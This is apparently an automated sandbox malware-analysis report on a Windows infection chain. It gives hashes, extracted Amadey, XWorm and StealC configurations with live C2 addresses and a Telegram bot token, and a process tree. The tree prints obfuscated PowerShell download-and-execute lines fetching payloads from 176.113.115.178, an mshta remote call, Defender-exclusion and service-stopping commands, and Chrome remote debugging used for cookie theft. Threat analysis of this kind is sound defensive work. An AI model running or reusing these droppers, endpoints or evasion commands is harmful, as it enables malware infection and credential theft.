Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 23:21

General

  • Target

    YD0SU_file.exe

  • Size

    1.8MB

  • MD5

    a68bd83f0cedd6b76cca22d5853ec168

  • SHA1

    ce0eae756e594d55f9a3835fb46fa82895c12c76

  • SHA256

    1c2f115d150d479f4ee5665477ccbfcb0ebda06e7767c90e87f55f23bacb6125

  • SHA512

    8441eb36925308b653caf7abdb34dbcb88799f14fd5fc9f11ba363206a46e83430c4caf804631b23c5dcb710da56bb691371fd5fc7a01461006387364baa85f0

  • SSDEEP

    49152:44ylfSD3avYUIh0+OZiq+ZrodAR2u6EuY:47lfSDfUHwrodAR2u5F

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

C2

87.120.112.33:8398

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies security service 2 TTPs 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Modifies security service
      • Loads dropped DLL
      PID:480
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:588
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:836
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
                PID:1688
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks BIOS information in registry
                • Checks processor information in registry
                PID:2872
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                3⤵
                  PID:4152
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:668
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  • Indicator Removal: Clear Windows Event Logs
                  PID:736
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:812
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1172
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      • Suspicious use of AdjustPrivilegeToken
                      PID:848
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {D5F3C502-31F4-48B8-8902-19BAE7963700} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
                        3⤵
                          PID:4568
                          • C:\Users\Admin\AppData\Local\Temp\service123.exe
                            C:\Users\Admin\AppData\Local\Temp\/service123.exe
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:4664
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService
                        2⤵
                          PID:960
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k NetworkService
                          2⤵
                            PID:108
                          • C:\Windows\System32\spoolsv.exe
                            C:\Windows\System32\spoolsv.exe
                            2⤵
                              PID:348
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                              2⤵
                                PID:1032
                              • C:\Windows\system32\taskhost.exe
                                "taskhost.exe"
                                2⤵
                                  PID:1120
                                • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                  2⤵
                                    PID:1520
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                    2⤵
                                      PID:1928
                                    • C:\Windows\system32\sppsvc.exe
                                      C:\Windows\system32\sppsvc.exe
                                      2⤵
                                        PID:2844
                                      • C:\ProgramData\Mig\Mig.exe
                                        C:\ProgramData\Mig\Mig.exe
                                        2⤵
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3908
                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1208
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                          3⤵
                                            PID:3732
                                            • C:\Windows\system32\wusa.exe
                                              wusa /uninstall /kb:890830 /quiet /norestart
                                              4⤵
                                              • Drops file in Windows directory
                                              PID:3924
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop UsoSvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:3740
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:2772
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop wuauserv
                                            3⤵
                                            • Launches sc.exe
                                            PID:3504
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop bits
                                            3⤵
                                            • Launches sc.exe
                                            PID:1864
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop dosvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:400
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            3⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3492
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                            3⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2524
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                            3⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3920
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                            3⤵
                                            • Power Settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3816
                                          • C:\Windows\system32\dialer.exe
                                            C:\Windows\system32\dialer.exe
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3364
                                          • C:\Windows\system32\dialer.exe
                                            C:\Windows\system32\dialer.exe
                                            3⤵
                                              PID:3376
                                            • C:\Windows\system32\dialer.exe
                                              dialer.exe
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3452
                                          • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                            "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                            2⤵
                                              PID:5064
                                          • C:\Windows\system32\lsass.exe
                                            C:\Windows\system32\lsass.exe
                                            1⤵
                                              PID:488
                                            • C:\Windows\system32\lsm.exe
                                              C:\Windows\system32\lsm.exe
                                              1⤵
                                                PID:496
                                              • C:\Windows\Explorer.EXE
                                                C:\Windows\Explorer.EXE
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                PID:1216
                                                • C:\Users\Admin\AppData\Local\Temp\YD0SU_file.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\YD0SU_file.exe"
                                                  2⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Identifies Wine through registry keys
                                                  • Loads dropped DLL
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3028
                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                    3⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Adds Run key to start application
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2768
                                                    • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
                                                      4⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies system certificate store
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1652
                                                    • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:264
                                                      • C:\Windows\system32\wscript.exe
                                                        "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                        5⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2252
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                          6⤵
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3016
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                            7⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2424
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                              8⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1812
                                                              • C:\Windows\system32\mshta.exe
                                                                mshta http://176.113.115.178/Windows-Update
                                                                9⤵
                                                                • Blocklisted process makes network request
                                                                • Modifies Internet Explorer settings
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2028
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                  10⤵
                                                                  • UAC bypass
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Loads dropped DLL
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1932
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                    11⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1420
                                                                  • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                    "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                    11⤵
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2252
                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                      12⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Drops file in System32 directory
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2276
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                      12⤵
                                                                        PID:2132
                                                                        • C:\Windows\system32\wusa.exe
                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                          13⤵
                                                                          • Drops file in Windows directory
                                                                          PID:1716
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:3060
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:616
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:2356
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop bits
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:1080
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:1620
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        12⤵
                                                                        • Power Settings
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:840
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        12⤵
                                                                        • Power Settings
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2036
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        12⤵
                                                                        • Power Settings
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1948
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        12⤵
                                                                        • Power Settings
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2040
                                                                      • C:\Windows\system32\dialer.exe
                                                                        C:\Windows\system32\dialer.exe
                                                                        12⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1728
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe delete "LIB"
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:3048
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:2668
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:3500
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe start "LIB"
                                                                        12⤵
                                                                        • Launches sc.exe
                                                                        PID:3508
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                            6⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3056
                                                            • C:\Windows\system32\ipconfig.exe
                                                              "C:\Windows\system32\ipconfig.exe" /flushdns
                                                              7⤵
                                                              • Gathers network information
                                                              PID:1920
                                                      • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2680
                                                        • C:\Users\Admin\AppData\Local\Temp\is-ARGOP.tmp\FunnyJellyfish.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-ARGOP.tmp\FunnyJellyfish.tmp" /SL5="$D0126,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2144
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                            6⤵
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2752
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /T 3
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Delays execution with timeout.exe
                                                              PID:2888
                                                            • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3028
                                                              • C:\Users\Admin\AppData\Local\Temp\is-1E9R1.tmp\FunnyJellyfish.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-1E9R1.tmp\FunnyJellyfish.tmp" /SL5="$401C2,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:2180
                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                  "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                                  9⤵
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2428
                                                                  • C:\Windows\system32\regsvr32.exe
                                                                    /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                                    10⤵
                                                                    • Loads dropped DLL
                                                                    PID:2228
                                                      • C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"
                                                        4⤵
                                                        • Drops startup file
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Suspicious behavior: AddClipboardFormatListener
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2592
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1740
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1088
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1672
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2460
                                                      • C:\Users\Admin\AppData\Local\Temp\1008050001\b9ad333880.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1008050001\b9ad333880.exe"
                                                        4⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Checks processor information in registry
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2032
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          • Enumerates system info in registry
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:4724
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6389758,0x7fef6389768,0x7fef6389778
                                                            6⤵
                                                              PID:3652
                                                            • C:\Windows\system32\ctfmon.exe
                                                              ctfmon.exe
                                                              6⤵
                                                                PID:4848
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
